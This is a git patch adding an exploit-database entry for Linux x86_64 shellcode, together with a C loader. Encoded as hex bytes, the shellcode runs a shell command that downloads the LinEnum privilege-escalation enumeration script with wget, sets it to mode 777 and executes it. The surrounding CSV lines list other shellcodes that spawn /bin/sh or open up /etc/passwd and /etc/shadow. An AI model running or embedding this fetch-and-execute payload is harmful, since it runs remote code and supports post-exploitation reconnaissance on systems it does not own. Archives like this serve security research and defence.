From 5c06a41d94700873b122e57c2e6304d8e4c16bc2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 24 Jul 2019 05:02:23 +0000 Subject: [PATCH] DB: 2019-07-24 1 changes to exploits/shellcodes Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes) --- files_shellcodes.csv | 1 + shellcodes/linux_x86-64/47151.c | 66 +++++++++++++++++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 shellcodes/linux_x86-64/47151.c diff --git a/files_shellcodes.csv b/files_shellcodes.csv index edd836b99..0c7cfaa3a 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -988,3 +988,4 @@ id,file,description,date,author,type,platform 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86 +47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64 diff --git a/shellcodes/linux_x86-64/47151.c b/shellcodes/linux_x86-64/47151.c new file mode 100644 index 000000000..02b6a80bc --- /dev/null +++ b/shellcodes/linux_x86-64/47151.c @@ -0,0 +1,66 @@ +/* +LinEnum (Linux Enumeration) Wget & CHMOD & Run Shellcode Language C & ASM - Linux/x86_64 + +author : Kağan Çapar +contact: kagancapar@gmail.com +shellcode len : 155 bytes +compilation: gcc -o shellcode shellcode.c + +test: +run ./shellcode + +description: First, the linenum script is via github with wget command. After change mod 777 and run! + +assembly: + +_start: +push 0x3b {var_8} {"content.com/rebootuser/LinEnum/m…"} +pop rax {var_8} {0x3b, "content.com/rebootuser/LinEnum/m…"} +cdq {0x3b, "content.com/rebootuser/LinEnum/m…"} {0x0} {0x3b, "content.com/rebootuser/LinEnum/m…"} +mov rbx, 0x68732f6e69622f +push rbx {var_8} {0x68732f6e69622f} +mov rdi, rsp {var_8} +push 0x632d {var_10} +mov rsi, rsp {var_10} +push rdx {var_18} {0x0} +call sub_94 {sub_20, "wget https://raw.githubuserconte…"} { Falls through into sub_20 } + +*/ + +#include +#include +#include +#include + +int (*sc)(); + +char library[] = +"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53" +"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x74\x00" +"\x00\x00\x77\x67\x65\x74\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f" +"\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63" +"\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x72\x65\x62\x6f" +"\x6f\x74\x75\x73\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2f" +"\x6d\x61\x73\x74\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e" +"\x73\x68\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x37\x37\x37" +"\x20\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x20\x26\x26\x20" +"\x2e\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x00\x56\x57" +"\x48\x89\xe6\x0f\x05"; + +int main(int argc, char **argv) { + printf("library Length: %zd Bytes\n", strlen(library)); + + void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + + if (ptr == MAP_FAILED) { + perror("mmap"); + exit(-1); + } + + memcpy(ptr, library, sizeof(library)); + sc = ptr; + + sc(); + + return 0; +} \ No newline at end of file